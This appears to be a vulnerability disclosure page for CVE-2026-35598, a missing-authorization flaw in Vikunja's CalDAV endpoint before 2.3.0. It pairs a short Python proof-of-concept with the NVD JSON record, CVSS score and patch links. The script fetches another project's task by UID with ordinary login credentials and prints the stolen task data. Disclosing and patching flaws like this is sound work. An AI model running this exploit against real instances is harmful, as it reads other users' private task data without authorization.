CVE-2026-35598

import requests from requests.auth import HTTPBasicAuth # Target configuration TARGET_URL = "https://vikunja.example.com/dav/calendars/user/" USERNAME = "[email protected]" PASSWORD = "password" TASK_UID = "target-task-uid-12345" # The UID of the task the attacker wants to read # Exploit code to fetch a task by UID without project access check # Note: This simulates the CalDAV GET request def exploit(): # Authenticate with the CalDAV endpoint auth = HTTPBasicAuth(USERNAME, PASSWORD) # Construct the URL to fetch the specific task resource by UID # In a real scenario, the exact path might vary based on Vikunja's CalDAV routing exploit_url = f"{TARGET_URL}{TASK_UID}.ics" try: print(f"[*] Attempting to fetch task with UID: {TASK_UID}") response = requests.get(exploit_url, auth=auth) if response.status_code == 200: print("[+] Exploit successful! Task data retrieved:") print(response.text) else: print(f"[-] Failed to retrieve task. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-35598", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.370", "lastModified": "2026-04-17T21:57:42.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2579", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}